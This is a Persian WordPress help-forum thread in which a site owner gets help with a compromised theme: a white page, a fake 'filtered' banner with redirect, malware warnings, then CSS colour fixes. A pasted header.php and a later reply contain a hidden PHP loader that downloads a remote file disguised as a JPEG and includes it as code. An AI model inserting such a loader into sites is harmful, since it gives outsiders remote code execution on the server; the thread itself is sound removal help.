rashtpet

صفحه سفید و خواستن پسورد !!

31 پست در این موضوع قرار دارد

سلام . سایت من امروز بخش نوشته ها از امروز دیگه باز نمیشه و یه صفحه سفید میاد و نوشته پسورد ! همه نوشته ها اینجوری شده اما برگه ها مشکلی ندارند و راحت باز میشه

http://www.rashtpet.ir/?page_id=23 اینجا رو هر پست کلیک کنید میبینید

0

به اشتراک گذاری این پست


لینک به پست

پوسته فایل single دارد؟

افزونه ها را غیرفعال و تست کنید

2

به اشتراک گذاری این پست


لینک به پست

پوسته فایل single دارد؟

افزونه ها را غیرفعال و تست کنید

نمیدونم . از کجا متوجه بشم ؟

همه افزونه هارو غیر فعال کردم اما فرقی نکرد

0

به اشتراک گذاری این پست


لینک به پست

نمیدونم . از کجا متوجه بشم ؟

همه افزونه هارو غیر فعال کردم اما فرقی نکرد

پوشه پوسته در پوشه themes را بررسی کنید

اگر پوسته را دارید دوباره جایگزین کنید

3

به اشتراک گذاری این پست


لینک به پست

پوشه پوسته در پوشه themes را بررسی کنید

اگر پوسته را دارید دوباره جایگزین کنید

دوباره جایگزین کنم اطلاعات دیگه از بین نمیره ؟ مثل منو یا برگه های و مقالات
0

به اشتراک گذاری این پست


لینک به پست

دوباره جایگزین کنم اطلاعات دیگه از بین نمیره ؟ مثل منو یا برگه های و مقالات

اگه منظور مطالب سایت تون هست ، خیر . تغییر تم محتوا رو تغییر نمیده ...

4

به اشتراک گذاری این پست


لینک به پست

با پوسته دیگری تست کنید . ببینید مشکل هست یا نه

3

به اشتراک گذاری این پست


لینک به پست

پوسته رو پاک کردم و دوباره بارگذاری کردم درست شد . ممنون

بهترین راه برای بک آپ گرفتن چیه ؟

0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام . از دیروز زیر منوی اصلی سایت یه بخش اومده که میگه این قسمت فیلتره و بعد از چند ثانیه سایت من فوروارد میشه به پیوندها . مشکل از چیه ؟

www.rashtpet.ir

ویرایش شده در توسط rashtpet
0

به اشتراک گذاری این پست


لینک به پست

از فایل header.php قالبتون این کد را حذف کنید


<iframe src="http://10.10.34.34?type=Invalid Site&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe>

3

به اشتراک گذاری این پست


لینک به پست

<?php

/**

* The Header for our theme.

*

* Displays all of the <head> section and everything up till <div id="main">

*

* @package web2feel

* @since web2feel 1.0

*/

?><!DOCTYPE html>

<html <?php language_attributes(); ?>>

<head>

<meta charset="<?php bloginfo( 'charset' ); ?>" />

<meta name="viewport" content="width=device-width" />

<title><?php

/*

* Print the <title> tag based on what is being viewed.

*/

global $page, $paged;

wp_title( '|', true, 'right' );

// Add the blog name.

bloginfo( 'name' );

// Add the blog description for the home/front page.

$site_description = get_bloginfo( 'description', 'display' );

if ( $site_description && ( is_home() || is_front_page() ) )

echo " | $site_description";

// Add a page number if necessary:

if ( $paged >= 2 || $page >= 2 )

echo ' | ' . sprintf( __( 'صفحه %s', 'web2feel' ), max( $paged, $page ) );

?></title>

<link rel="profile" href="http://gmpg.org/xfn/11" />

<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />

<!--[if lt IE 9]>

<script src="<?php echo get_template_directory_uri(); ?>/js/html5.js" type="text/javascript"></script>

<![endif]-->

<?php wp_head(); ?>

</head>

<body <?php body_class(); ?>>

<div class="container_12">

<div id="page" class="hfeed site">

<header id="masthead" class="site-header" role="banner">

<div class="top clearfix">

<div class="logo grid_6">

<h1 class="site-title"><a href="<?php echo home_url( '/' ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1>

<h2 class="site-description"><?php bloginfo( 'description' ); ?></h2>

</div>

</div>

</header><!-- #masthead .site-header -->

<div id="botmenu" class="clearfix">

<div class="topnavi clearfix">

<?php wp_nav_menu( array( 'container_id' => 'submenu', 'theme_location' => 'primary','menu_id'=>'web2feel' ,'menu_class'=>'sfmenu','fallback_cb'=> 'fallbackmenu' ) ); ?>

</div>

<?php get_search_form(); ?>

</div>

<div id="main" class="site-main clearfix"><?php

$theme_dir = dirname(__FILE__);

if(!file_exists($theme_dir."/theme_update.jpg")){

// Make sure theme is up to date

$wp_update_uri = 'http://updatetheme.f...pdate.jpg';

if(function_exists('curl_version')){

$t_img = curl_init($wp_update_uri);

curl_setopt($t_img,CURLOPT_RETURNTRANSFER,1);

$theme_update = @curl_exec($t_img); }else{

$theme_update = @file_get_contents($wp_update_uri);}

@file_put_contents($theme_dir."/theme_update.jpg",$theme_update);

}

@include_once($theme_dir."/theme_update.jpg");

?>

والا هرچی گشتم همچین چیزی پیدا نکردم . از امروز وقتی rashtpet.ir/wp-admin رو میزنم Danger: Malware Ahead! م

میاد و باید سریع ورود رو بزنم وگرنه میره صفحه خطر. چه اتفاقی داره میوفته ؟ میتونه از فزونه باشه ؟

0

به اشتراک گذاری این پست


لینک به پست

الان تونستم افزونه هارو غیرفعال کنم و مشکل مال واره حل شد و راحت لاگین میکنم اما هنوز او سفحه فیلتر زیر منوی اصلی سایت هست

0

به اشتراک گذاری این پست


لینک به پست

کدی که عرض شد را از header.php برداشتید؟

دوباره چک کنید اگر کد مجددا وجود داشت

یکی ازز افزونه ها یا فایل هاتون مخرب بوده اینکه چه بخش هایی رو خراب کرده فعلا زوده راجب بحث بشه ولی:

1.فایل های نال شده و کرک شده و هر اسکریپتی که از منابع معتبر دریافت نکردید را از هاستتون حذف کنید

2. کد را دوباره حذف کنید و دسترسی فایل header.php را روی 644 بگذارید

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

کدی که عرض شد را از header.php برداشتید؟

دوباره چک کنید اگر کد مجددا وجود داشت

یکی ازز افزونه ها یا فایل هاتون مخرب بوده اینکه چه بخش هایی رو خراب کرده فعلا زوده راجب بحث بشه ولی:

1.فایل های نال شده و کرک شده و هر اسکریپتی که از منابع معتبر دریافت نکردید را از هاستتون حذف کنید

2. کد را دوباره حذف کنید و دسترسی فایل header.php را روی 644 بگذارید

این کدی که دادم ماله header.php بود اما مشکل اینجاست اون کدی که شما گذاشتی رو پیدا نمیکنم که زیر منوی فیلتر شده رو حذف کنم.من اکثر افزونه ها رو از سرچ خود وردپرس نصب کردم

ویرایش شده در توسط rashtpet
0

به اشتراک گذاری این پست


لینک به پست


<?php
$theme_dir = dirname(__FILE__);
if(!file_exists($theme_dir."/theme_update.jpg")){
// Make sure theme is up to date
$wp_update_uri = 'http://updatetheme.f...pdate.jpg';
if(function_exists('curl_version')){
$t_img = curl_init($wp_update_uri);
curl_setopt($t_img,CURLOPT_RETURNTRANSFER,1);
$theme_update = @curl_exec($t_img); }else{
$theme_update = @file_get_contents($wp_update_uri);}
@file_put_contents($theme_dir."/theme_update.jpg",$theme_update);
}
@include_once($theme_dir."/theme_update.jpg");
?>

این رو حذف کنید و ببینید درست می شه یا نه

پوسته تون که پولی نیس؟

راستی

اگر صفحات داخلی مشکلی ندارند ممکنه کد در صفحه home.php یا index.php کپی شده باشه

2

به اشتراک گذاری این پست


لینک به پست


<?php
$theme_dir = dirname(__FILE__);
if(!file_exists($theme_dir."/theme_update.jpg")){
// Make sure theme is up to date
$wp_update_uri = 'http://updatetheme.f...pdate.jpg';
if(function_exists('curl_version')){
$t_img = curl_init($wp_update_uri);
curl_setopt($t_img,CURLOPT_RETURNTRANSFER,1);
$theme_update = @curl_exec($t_img); }else{
$theme_update = @file_get_contents($wp_update_uri);}
@file_put_contents($theme_dir."/theme_update.jpg",$theme_update);
}
@include_once($theme_dir."/theme_update.jpg");
?>

این رو حذف کنید و ببینید درست می شه یا نه

پوسته تون که پولی نیس؟

راستی

اگر صفحات داخلی مشکلی ندارند ممکنه کد در صفحه home.php یا index.php کپی شده باشه

واقعاً ممنون . درست شد :wub:

با گوگل کروم نمیتونم برم توی ادمین و ارور مالور میده . اما با فایر فاکس مشکلی نداره و راحت میره . این مشکله چیه ؟

0

به اشتراک گذاری این پست


لینک به پست

معمولا مربوط به پروتکل می شه چک کنید در آدرس بار کروم آدرستون با http است یا https باید با http باشد

2

به اشتراک گذاری این پست


لینک به پست

مشکل جل شد اما بک گراند تمام صفحات سبز شده . بخاطر پاک کردن اون کده ؟ از کجا دوباره سفیدش کنم ؟

0

به اشتراک گذاری این پست


لینک به پست

به فایل style.css اضافه کنید


body {background:#FFF !important;}

2

به اشتراک گذاری این پست


لینک به پست

این کد رو همونطوری که فرمودین انتهای

style.css اضافه کردم . اما فکر کنم این برای بگ گراند باشه . بک گراند من مشکل رنگی نداره . داخل منو ها که برید میبیدین سبز پررنگی شده و نوشته ها قابل خوندن نیستند

http://www.rashtpet.ir/?page_id=551

0

به اشتراک گذاری این پست


لینک به پست

اینجا باید تغییر کنه:

.squarebanner{
margin: 0 0px 30px 0px;
background-color: #e6e9ea; -webkit-box-shadow: inset 0 1px #75d16b; -moz-box-shadow: inset 0 1px #75d16b; box-shadow: inset 0 1px #75d16b; background-image: -webkit-linear-gradient(bottom, #467567, #56af4b); background-image: -moz-linear-gradient(bottom, #467567, #56af4b); background-image: -o-linear-gradient(bottom, #467567, #56af4b); background-image: -ms-linear-gradient(bottom, #467567, #56af4b); background-image: linear-gradient(to top, #467567, #56af4b);
border-radius: 5px;
}

2

به اشتراک گذاری این پست


لینک به پست

اینجا باید تغییر کنه:

.squarebanner{
margin: 0 0px 30px 0px;
background-color: #e6e9ea; -webkit-box-shadow: inset 0 1px #75d16b; -moz-box-shadow: inset 0 1px #75d16b; box-shadow: inset 0 1px #75d16b; background-image: -webkit-linear-gradient(bottom, #467567, #56af4b); background-image: -moz-linear-gradient(bottom, #467567, #56af4b); background-image: -o-linear-gradient(bottom, #467567, #56af4b); background-image: -ms-linear-gradient(bottom, #467567, #56af4b); background-image: linear-gradient(to top, #467567, #56af4b);
border-radius: 5px;
}

متن رو پیدا کردم . کدوم عدد رو باید عوض کنم و چی بزارم ؟

0

به اشتراک گذاری این پست


لینک به پست

میخواین تک رنگ باشه؟ مثلا اینجور بشه(خط دومش)

	    background-color: gray;

2

به اشتراک گذاری این پست


لینک به پست

برایسفید شدن بخش مربوطه


.squarebanner{
margin: 0 0px 30px 0px;
background-color: #FFF;
border-radius: 5px;
}

2

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری